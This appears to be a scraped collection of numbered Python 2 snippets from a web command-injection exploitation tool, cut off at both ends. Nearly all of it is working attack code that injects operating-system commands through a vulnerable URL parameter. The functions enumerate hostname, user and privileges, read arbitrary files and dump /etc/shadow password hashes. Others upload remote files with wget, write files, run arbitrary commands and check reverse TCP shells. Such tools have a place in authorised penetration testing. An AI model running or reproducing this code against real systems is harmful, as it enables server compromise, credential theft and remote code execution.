        success_msg = "The hostname is " + shell + ".\n"
        output_file.write("    " +
                          re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).
                          sub("", settings.SUCCESS_SIGN) + success_msg)
        output_file.close()
Example #17
0
def powershell_version(separator, payload, TAG, delay, prefix, suffix,
                       http_request_method, url, vuln_parameter,
                       OUTPUT_TEXTFILE, alter_shell, filename):
    cmd = settings.PS_VERSION
    if alter_shell:
        cmd = cmd.replace("'", "\\'")
    #Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    # Evaluate injection results.
    ps_version = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    try:
        ps_version = "".join(str(p) for p in ps_version)
        if float(ps_version):
            settings.PS_ENABLED = True
            if menu.options.verbose:
                print ""
            # Output PowerShell's version number
            sys.stdout.write(Style.BRIGHT +
                             "(!) The PowerShell's version number is " +
                             Style.UNDERLINE + ps_version + Style.RESET_ALL +
                             Style.BRIGHT + Style.RESET_ALL + ".\n")
            sys.stdout.flush()
            # Add infos to logs file.
            output_file = open(filename, "a")
            output_file.write("    (!) The PowerShell's version number is " +
                              ps_version + ".\n")
            output_file.close()
    except ValueError:
        print Fore.YELLOW + settings.WARNING_SIGN + "Heuristics have failed to identify PowerShell's version, which means that some payloads or injection techniques may be failed." + Style.RESET_ALL
        settings.PS_ENABLED = False
Example #18
0
def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE):
  if settings.EVAL_BASED_STATE != False:
    # Command execution results.
    start = time.time()
    response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
    end = time.time()
    diff = end - start
    # Evaluate injection results.
    shell = eb_injector.injection_results(response, TAG, cmd)
  else:
    # Command execution results.
    start = time.time()
    if settings.FILE_BASED_STATE == True:
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    else:
      whitespace = settings.WHITESPACE[0]
      if whitespace == " ":
        whitespace = urllib.quote(whitespace) 
      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
    end = time.time()
    diff = end - start
    # Evaluate injection results.
    shell = cb_injector.injection_results(response, TAG, cmd)

  if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6):
    check_established_connection()
  else:
    if settings.VERBOSITY_LEVEL == 1:
      print("")

  err_msg = "The " + os_shell_option.split("_")[0] + " "
  err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!"
  print(settings.print_critical_msg(err_msg))
Example #19
0
def file_read(separator, payload, TAG, delay, prefix, suffix,
              http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
              alter_shell, filename):
    file_to_read = menu.options.file_read
    # Execute command
    cmd = "echo $(" + settings.FILE_READ + file_to_read + ")"
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    if menu.options.verbose:
        print ""
    if shell:
        sys.stdout.write(Style.BRIGHT + "(!) The contents of file '" +
                         Style.UNDERLINE + file_to_read + Style.RESET_ALL +
                         "' : ")
        sys.stdout.flush()
        print shell
        output_file = open(filename, "a")
        output_file.write("    (!) The contents of file '" + file_to_read +
                          "' : " + shell + ".\n")
        output_file.close()
    else:
        sys.stdout.write(
            Fore.YELLOW +
            "(^) Warning: It seems that you don't have permissions to read the '"
            + file_to_read + "' file." + Style.RESET_ALL + "\n")
        sys.stdout.flush()
Example #20
0
def delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE + " " + separator + settings.WIN_COMMENT
  else: 
    settings.SRV_ROOT_DIR = ""
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #21
0
def hostname(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    settings.HOSTNAME = settings.WIN_HOSTNAME 
  cmd = settings.HOSTNAME
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
    # Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    # if settings.VERBOSITY_LEVEL != 0:
    #   print("")
    info_msg = "The hostname is " +  str(shell)
    sys.stdout.write(settings.print_bold_info_msg(info_msg) + ".\n")
    sys.stdout.flush()
    # Add infos to logs file. 
    output_file = open(filename, "a")
    info_msg = "The hostname is " + str(shell) + ".\n"
    output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.INFO_BOLD_SIGN) + info_msg)
    output_file.close()
  else:
    warn_msg = "Heuristics have failed to identify the hostname."
    print(settings.print_warning_msg(warn_msg))
Example #22
0
def file_read(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_read = menu.options.file_read
  # Execute command
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_FILE_READ + file_to_read
  else:
    cmd = settings.FILE_READ + file_to_read 
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if settings.VERBOSITY_LEVEL >= 1:
    print ""
  if shell:
    success_msg = "The contents of file '"  
    success_msg += file_to_read + "'" + Style.RESET_ALL + ": "
    sys.stdout.write(settings.print_success_msg(success_msg))
    print shell
    output_file = open(filename, "a")
    success_msg = "The contents of file '"
    success_msg += file_to_read + "' : " + shell + ".\n"
    output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
    output_file.close()
  else:
    warn_msg = "It seems that you don't have permissions "
    warn_msg += "to read the '" + file_to_read + "' file."
    sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
    sys.stdout.flush()
Example #23
0
def file_read(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_read = menu.options.file_read
  # Execute command
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_FILE_READ + file_to_read
  else:
    cmd = settings.FILE_READ + file_to_read 
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if menu.options.verbose:
    print ""
  if shell:
    sys.stdout.write(Style.BRIGHT + "(!) The contents of file '" + Style.UNDERLINE + file_to_read + Style.RESET_ALL + "' : ")
    sys.stdout.flush()
    print shell
    output_file = open(filename, "a")
    output_file.write("    (!) The contents of file '" + file_to_read + "' : " + shell + ".\n")
    output_file.close()
  else:
   sys.stdout.write(Fore.YELLOW + settings.WARNING_SIGN + "It seems that you don't have permissions to read the '" + file_to_read + "' file." + Style.RESET_ALL + "\n")
   sys.stdout.flush()
Example #24
0
def hostname(separator, payload, TAG, delay, prefix, suffix,
             http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
             alter_shell, filename):
    if settings.TARGET_OS == "win":
        settings.HOSTNAME = settings.WIN_HOSTNAME
    cmd = settings.HOSTNAME
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
        # Evaluate injection results.
        shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
        shell = "".join(str(p) for p in shell)
        session_handler.store_cmd(url, cmd, shell, vuln_parameter)
    else:
        shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if shell:
        if menu.options.verbose:
            print ""
        sys.stdout.write(Style.BRIGHT + "(!) The hostname is " +
                         Style.UNDERLINE + shell + Style.RESET_ALL + ".\n")
        sys.stdout.flush()
        # Add infos to logs file.
        output_file = open(filename, "a")
        output_file.write("    (!) The hostname is " + shell + ".\n")
        output_file.close()
Example #25
0
def delete_previous_shell(
    separator,
    payload,
    TAG,
    prefix,
    suffix,
    http_request_method,
    url,
    vuln_parameter,
    OUTPUT_TEXTFILE,
    alter_shell,
    filename,
):
    cmd = "rm " + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE
    response = fb_injector.injection(
        separator,
        payload,
        TAG,
        cmd,
        prefix,
        suffix,
        http_request_method,
        url,
        vuln_parameter,
        OUTPUT_TEXTFILE,
        alter_shell,
        filename,
    )
Example #26
0
def delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if menu.options.verbose:
    print "",
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:  
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE + " "
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #27
0
def delete_previous_shell(separator, payload, TAG, prefix, suffix,
                          http_request_method, url, vuln_parameter,
                          OUTPUT_TEXTFILE, alter_shell, filename):
    cmd = "rm " + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
Example #28
0
def delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.VERBOSITY_LEVEL >= 1:
    print "",
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:
    settings.SRV_ROOT_DIR = ""
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE + settings.COMMENT
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #29
0
def delete_previous_shell(separator, payload, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.VERBOSITY_LEVEL >= 1:
    info_msg = "Deleting the created (" + OUTPUT_TEXTFILE + ") file..."
    sys.stdout.write(settings.print_info_msg(info_msg))
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:  
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE + " " + settings.COMMENT
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #30
0
def delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if menu.options.verbose:
    info_msg = "Deleting the created (" + OUTPUT_TEXTFILE + ") file..."
    sys.stdout.write("\n" + settings.print_info_msg(info_msg))
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:  
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE + settings.COMMENT
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #31
0
def delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.VERBOSITY_LEVEL >= 1:
    print "",
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:
    settings.SRV_ROOT_DIR = ""
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE + settings.COMMENT
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #32
0
def file_upload(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    # Not yet implemented
    pass
  else:
    file_to_upload = menu.options.file_upload
    # check if remote file exists.
    try:
      urllib2.urlopen(file_to_upload)
    except urllib2.HTTPError, err:
      sys.stdout.write(Fore.YELLOW + settings.WARNING_SIGN + "It seems that the '" + file_to_upload + "' file, does not exists. (" +str(err)+ ")" + Style.RESET_ALL + "\n")
      sys.stdout.flush()
      sys.exit(0)
      
    # Check the file-destination
    if os.path.split(menu.options.file_dest)[1] == "" :
      dest_to_upload = os.path.split(menu.options.file_dest)[0] + "/" + os.path.split(menu.options.file_upload)[1]
    elif os.path.split(menu.options.file_dest)[0] == "/":
      dest_to_upload = "/" + os.path.split(menu.options.file_dest)[1] + "/" + os.path.split(menu.options.file_upload)[1]
    else:
      dest_to_upload = menu.options.file_dest
      
    # Execute command
    cmd = settings.FILE_UPLOAD + file_to_upload + " -O " + dest_to_upload 
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    
    # Check if file exists!
    if settings.TARGET_OS == "win":
      cmd = "dir " + dest_to_upload + ")"
    else:  
      cmd = "echo $(ls " + dest_to_upload + ")"
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    if shell:
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The " + Style.UNDERLINE + shell + Style.RESET_ALL + Style.BRIGHT + " file was uploaded successfully!" + Style.RESET_ALL + "\n")
      sys.stdout.flush()
    else:
     sys.stdout.write(Fore.YELLOW + settings.WARNING_SIGN + "It seems that you don't have permissions to write the '" + dest_to_upload + "' file." + Style.RESET_ALL + "\n")
     sys.stdout.flush()
Example #33
0
def delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.VERBOSITY_LEVEL != 0:
    debug_msg = "Deleting the generated file '" + OUTPUT_TEXTFILE + "'.\n"
    sys.stdout.write(settings.print_debug_msg(debug_msg))
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:
    settings.WEB_ROOT = ""
    cmd = settings.DEL + settings.WEB_ROOT + OUTPUT_TEXTFILE + " " + settings.COMMENT 
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #34
0
def current_user(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd = settings.CURRENT_USER
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  cu_account = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if cu_account:
    cu_account = "".join(str(p) for p in cu_account)
    # Check if the user have super privileges.
    if menu.options.is_root:
      cmd = settings.ISROOT
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
      shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
      if shell:
        shell = "".join(str(p) for p in shell)
        if menu.options.verbose:
          print ""
        sys.stdout.write(Style.BRIGHT + "(!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL)
        # Add infos to logs file.    
        output_file = open(filename, "a")
        output_file.write("    (!) The current user is " + cu_account)
        output_file.close()
        if shell != "0":
            sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "not" + Style.RESET_ALL + Style.BRIGHT + " privilleged" + Style.RESET_ALL + ".\n")
            sys.stdout.flush()
            # Add infos to logs file.   
            output_file = open(filename, "a")
            output_file.write(" and it is not privilleged.\n")
            output_file.close()
        else:
          sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "" + Style.RESET_ALL + Style.BRIGHT + " privilleged" + Style.RESET_ALL + ".\n")
          sys.stdout.flush()
          # Add infos to logs file.   
          output_file = open(filename, "a")
          output_file.write(" and it is privilleged.\n")
          output_file.close()
    else:
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      output_file.write("    (!) The current user is " + cu_account + "\n")
      output_file.close()
Example #35
0
def delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.VERBOSITY_LEVEL >= 1:
    info_msg = "Deleting the created (" + OUTPUT_TEXTFILE + ") file...\n"
    sys.stdout.write(settings.print_info_msg(info_msg))
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
  else:
    settings.WEB_ROOT = ""
    cmd = settings.DEL + settings.WEB_ROOT + OUTPUT_TEXTFILE + " " + settings.COMMENT 
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #36
0
def system_passwords(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    # Not yet implemented!
    pass 
  else:
    cmd = settings.SYS_PASSES            
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
      # Evaluate injection results.
      sys_passes = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
      sys_passes = "".join(str(p) for p in sys_passes)
      session_handler.store_cmd(url, cmd, sys_passes, vuln_parameter)
    else:
      sys_passes = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if sys_passes == "":
      sys_passes = " "
      if menu.options.verbose:
        print ""
      sys.stdout.write(settings.INFO_SIGN + "Fetching '" + settings.SHADOW_FILE + "' to enumerate users password hashes... ")
      sys.stdout.flush()
      sys_passes = "".join(str(p) for p in sys_passes)
      sys_passes = sys_passes.replace(" ", "\n")
      sys_passes = sys_passes.split( )
      if len(sys_passes) != 0 :
        sys.stdout.write("[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]")
        sys.stdout.write(Style.BRIGHT + "\n(!) Identified " + str(len(sys_passes)) + " entr" + ('ies', 'y')[len(sys_passes) == 1] + " in '" +  settings.SHADOW_FILE + "'.\n" + Style.RESET_ALL)
        sys.stdout.flush()
        # Add infos to logs file.   
        output_file = open(filename, "a")
        output_file.write("\n    (!) Identified " + str(len(sys_passes)) + " entr" + ('ies', 'y')[len(sys_passes) == 1] + " in '" +  settings.SHADOW_FILE + "'.\n" )
        output_file.close()
        count = 0
        for line in sys_passes:
          count = count + 1
          try:
            fields = line.split(":")
            if fields[1] != "*" and fields[1] != "!" and fields[1] != "":
              print "  (" +str(count)+ ") " + Style.BRIGHT + fields[0]+ Style.RESET_ALL + " : " + Style.BRIGHT + fields[1]+ Style.RESET_ALL
              # Add infos to logs file.   
              output_file = open(filename, "a")
              output_file.write("      (" +str(count)+ ") " + fields[0] + " : " + fields[1])
              output_file.close()
          # Check for appropriate '/etc/shadow' format.
          except IndexError:
            if count == 1 :
              sys.stdout.write(Fore.YELLOW + settings.WARNING_SIGN + "It seems that '" + settings.SHADOW_FILE + "' file is not in the appropriate format. Thus, it is expoted as a text file." + Style.RESET_ALL + "\n")
            print fields[0]
            output_file = open(filename, "a")
            output_file.write("      " + fields[0])
            output_file.close()
      else:
        sys.stdout.write("[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]")
        sys.stdout.flush()
        print "\n" + Fore.YELLOW + settings.WARNING_SIGN + "It seems that you don't have permissions to read '" + settings.SHADOW_FILE + "' to enumerate users password hashes." + Style.RESET_ALL
Example #37
0
def file_write(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_write = menu.options.file_write
  if not os.path.exists(file_to_write):
    sys.stdout.write(Fore.YELLOW + "(^) Warning: It seems that the '"+ file_to_write + "' file, does not exists." + Style.RESET_ALL + "\n")
    sys.stdout.flush()
    sys.exit(0)
    
  if os.path.isfile(file_to_write):
    with open(file_to_write, 'r') as content_file:
      content = [line.replace("\n", " ") for line in content_file]
    content = "".join(str(p) for p in content).replace("'", "\"")
  else:
    sys.stdout.write(Fore.YELLOW + "(^) Warning: It seems that '"+ file_to_write + "' is not a file." + Style.RESET_ALL + "\n")
    sys.stdout.flush()
    
  # Check the file-destination
  if os.path.split(menu.options.file_dest)[1] == "" :
    dest_to_write = os.path.split(menu.options.file_dest)[0] + "/" + os.path.split(menu.options.file_write)[1]
  elif os.path.split(menu.options.file_dest)[0] == "/":
    dest_to_write = "/" + os.path.split(menu.options.file_dest)[1] + "/" + os.path.split(menu.options.file_write)[1]
  else:
    dest_to_write = menu.options.file_dest

  # Execute command
  cmd = "echo $(" + settings.FILE_WRITE + " '"+ content + "'" + " > " + "'" + dest_to_write + "'" + ")"
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  shell = "".join(str(p) for p in shell)
  
  # Check if file exists!
  cmd = "echo $(ls " + dest_to_write + ")"
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  shell = "".join(str(p) for p in shell)
  if shell:
    sys.stdout.write(Style.BRIGHT + "(!) The '" + Style.UNDERLINE + shell + Style.RESET_ALL + Style.BRIGHT +"' file was created successfully!" + Style.RESET_ALL + "\n")
    sys.stdout.flush()
  else:
   sys.stdout.write(Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write the '"+ dest_to_write + "' file." + Style.RESET_ALL + "\n")
   sys.stdout.flush()
def single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd =  menu.options.os_cmd
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if shell:
    if menu.options.verbose:
      print ""
    shell = "".join(str(p) for p in shell)
    if shell != "":
      print Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
    else:
      print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL 
    sys.exit(0)
Example #39
0
def delete_previous_shell(separator, payload, TAG, prefix, suffix,
                          http_request_method, url, vuln_parameter,
                          OUTPUT_TEXTFILE, alter_shell, filename):
    if menu.options.verbose:
        print "",
    if settings.TARGET_OS == "win":
        cmd = settings.WIN_DEL + OUTPUT_TEXTFILE
    else:
        cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE + " "
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, http_request_method, url,
                                     vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
Example #40
0
def single_os_cmd_exec(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  cmd =  menu.options.os_cmd
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if shell:
    if menu.options.verbose:
      print ""
    shell = " ".join(str(p) for p in shell)
    if shell != "":
      print Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL 
    else:
      print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL
  sys.exit(0)
Example #41
0
def system_information(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    settings.RECOGNISE_OS = settings.WIN_RECOGNISE_OS
  cmd = settings.RECOGNISE_OS        
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    target_os = "".join(str(p) for p in target_os)
    session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
  else:
    target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if target_os:
    if settings.TARGET_OS == "win":
      cmd = settings.WIN_RECOGNISE_HP
    else:
      cmd = settings.RECOGNISE_HP
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
      # Evaluate injection results.
      target_arch = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
      target_arch = "".join(str(p) for p in target_arch)
      session_handler.store_cmd(url, cmd, target_arch, vuln_parameter)
    else:
      target_arch = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if target_arch:
      if settings.VERBOSITY_LEVEL >= 1:
        print ""
      success_msg = "The target operating system is " +  target_os + Style.RESET_ALL  
      success_msg += Style.BRIGHT + " and the hardware platform is " +  target_arch
      sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      success_msg = "The target operating system is " + target_os
      success_msg += " and the hardware platform is " + target_arch + ".\n"
      output_file.write("    " + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
    output_file.close()
Example #42
0
def system_information(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    settings.RECOGNISE_OS = settings.WIN_RECOGNISE_OS
  cmd = settings.RECOGNISE_OS        
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    target_os = "".join(str(p) for p in target_os)
    session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
  else:
    target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if target_os:
    if settings.TARGET_OS == "win":
      cmd = settings.WIN_RECOGNISE_HP
    else:
      cmd = settings.RECOGNISE_HP
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
      # Evaluate injection results.
